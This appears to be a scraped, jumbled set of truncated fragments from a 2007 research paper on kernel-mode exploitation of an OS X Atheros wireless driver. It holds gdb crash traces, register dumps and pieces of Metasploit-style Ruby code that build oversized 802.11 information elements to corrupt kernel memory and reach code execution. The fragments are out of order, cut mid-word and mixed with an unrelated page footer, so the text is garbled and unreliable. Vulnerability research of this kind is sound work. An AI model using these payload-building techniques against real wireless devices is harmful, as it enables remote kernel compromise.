OS X Kernel-mode Exploitation in aWeekendSeptember, 2007David [email protected]://www.erratasec.com/
#5 0x008c7303 in sta_add ()#6 0x008bccb9 in ieee80211_add_scan ()#7 0x008cd799 in ieee80211_recv_mgmt ()#8 0x008ddbd9 in ath_recv_mgmt ()#9 0x008ce9a5
Tracking down the packet that crashes a wireless driver can be frustrating because it’s notnecessarily the last packet to be received or transmitted.
processed when the information is needed for a scan. OS X produces a new scan every fiveminutes. As such, the machine may take up to five minutes to cra
Things I Wish Google told me: kernel core dumps on Intel are brokenThe core kernel dumping functionality on the Intel architecture a ppears to be brok
Chapter 4Debugging the CrashOne of the many benefits of remote kernel debugging is the ability to view a stack back tracewith symbol information. The v
Aug 5 18:07:12 TestBox kernel[ 0]: [en:00:1c:10:0b:d0:a1] discard[en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32Aug 5 18
> if $ecx > 0x100>x/20x $ec x>end>continue>endEvery time this breakpoint is hit it will print the first 20 bytes of ECX and then cont
much as possible or one will be stuck typing the same commands repeatedly. On the targetmachine, the command to create the symbols for AirPortAtheros5
Chapter 5Analyzing MadwifiThe madwifi so urce code shows that most of the crashes occur while itera ting over the scancache stored in a variable known a
*/struct iee e802 11_s can_ entr y {u_int8_t s e_ma cadd r[IE EE80 211_ ADDR _LE N];u_int8_t s e_bs sid[ IEEE 8021 1_AD DR_L EN] ;u_int8_t s e_ss id[2
AbstractApple’s Mac OS X op erating syste m is attracting more attention from usersand security researchers alike. Despite this increased interest, th
0x008f3190 in sta_add ()2: x/i $eip 0x8f3190 <sta_add+865>: lea eax,[esi+63](gdb)0x008f3193 in sta_add ()2: x/i $eip 0x8f3193 <sta_add+868>
Chapter 6Getting Code ExecutionThe result of this flaw is that many things beyond the Extended Rate buffer in the ieee80211 scan entrystructure are corr
esi 0x41316341 1093755713edi 0xaca0000 181010432eip 0x1933de 0x 1933 deeflags 0x10203 66051cs 0x8 8ss 0x10 16ds 0x120010 11 7966 4es 0xc710010 2087321
A quick synopsis of this function’s purpose is that a pointer to a pointer is passed as theaddress to copy data to. There is some sanity checking to s
To help better understand this, it is helpful to single-step through the sta add function aftersending an Extended Rate IE that is larger than 100 byt
def make_r snrsn_data = Rex::Text.pattern_Create(223)rsn_frame ="\x30" +rsn_data.length.chr +rsn_datareturn rsn _fra meendAnd the associated
eflags 0x216 534cs 0x8 8ss 0x10 16ds 0x10 16es 0x190010 16 3841 6fs 0xc8c0010 210501648gs 0x48 72(gdb) step i0x008f5231 in ieee80211_saveie ()2: x/i $
#1 0x008e977c in scan_next ()Previous f rame inner to this frame (corrupt stack?)(gdb)As can be seen above, the kernel attempted to execute an instruc
#crashes o ften occur in the following locations so they are blankedxrate_build[67, 2]="\x00\x00"xrate_build[71, 4]="\x00\x00\x00\x00&q
eip 0x931f2b 0x 931f 2b <chanflags+11>eflags 0x246 582cs 0x8 8ss 0x10 16ds 0x10 16es 0xa4810010 -1535049712fs 0x10 16gs 0x12260048 304480328(gdb
Chapter 1IntroductionOS X has a strange plac e in the hearts and the minds of the research community.Security researchers, like most other users, enjo
Chapter 7AcknowledgementsThe author would like to thank a few different people for the massive amount of help. JonEllch taught me how to do wireless in
Chapter 8ConclusionThis paper has given a quick walk-through of a real vul nerab ility in Apple’s wireless driver interms of discovery and exploitatio
Bibliography[1] Apple, Inc. The Universal File Format. http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/refer
BackTrack2 is used b e cause it includes many special 802.11 drivers that are ca-pable of raw packet injection, a feature that most wifi drivers (frust
Chapter 2Vulnerability DiscoveryOne of the major staples in a researcher’s toolbox is binary analysis (where“binary” refers to compiled software code)
Things I wish Google Told me: Disassembling OS X binariesApple provides tools that support the manipulation of universal binarieswhich are capable of
0xc67ba50 : 0x8c923d (0x48 0x1 0 0x1e200010 0xc670010)0xc67bad4 : 0x8c7303 (0x371787c 0x1e202d0d 0x8 0x5)0xc67bb24 : 0x8bccb9 (0x3699804 0xc67bc8c 0x1
dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000Kernel ver sion :Darwin Ker nel Ver
Chapter 3The FlawStandard exploit development techniques rarely work well when applied to kernel-level vulner-abilities. The kernel environment is muc
Kommentare zu diesen Handbüchern